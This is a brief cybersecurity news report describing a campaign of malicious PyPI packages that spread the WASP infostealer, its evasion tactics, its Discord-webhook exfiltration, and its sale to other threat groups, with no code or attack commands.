HQ/EMEAFind out how we can help your business
A new cybersecurity campaign is releasing several malicious packages that deliver the WASP infostealer to steal troves of data such as personal information, cryptocurrency, and user credentials from targeted devices.
According to investigations, the latest WASP operation has included abilities that could consist of persistence establishment in an infected machine and bypass security products. The WASP operators use steganography for obfuscation, polymorphic malware, reboot persistence, and building a fake GitHub reputation that includes a Starjacking method.
Researchers claimed that the threat actors are using developed legitimate-looking fake user accounts on Steam or GitHub while stealing the profile information from well-known user accounts or already-made user accounts on PyPI.
Furthermore, the group creates different and vacant package names with minimal changes. The WASP infostealer actors have already infected over a hundred victims based on their Discord server.
The WASP infostealer is not selective about what to steal from its victim.
Cybersecurity analysts explained that the WASP infostealer malware could steal all the victim’s Discord accounts, passwords, cryptocurrency wallets, credit card information, and other profitable entities on the victim’s device.
Subsequently, the malware could send the stolen information to its operators via a hard-coded Discord webhook address. Its developers believed their malicious tool was elusive and undetectable to most security solutions. They offer the infostealing malware to other threat groups for $20, but they only accept crypto or gift card payments.
In a similar incident, a separate researcher discovered that dozens of newly published PyPI packages spread the WASP infostealer onto Python developer’s devices by hiding behind malicious code.
Another group of researchers revealed that several malicious PyPI packages use steganography, an image base code obfuscation and infecting through open-source projects on GitHub.
Other security providers need help stopping the threat actors from using PyPI packages as they could instantly create a new identity if they think researchers spot them. Cybersecurity firms should share threat intelligence with other groups to protect the open-source landscape from polymorphic malware attacks.
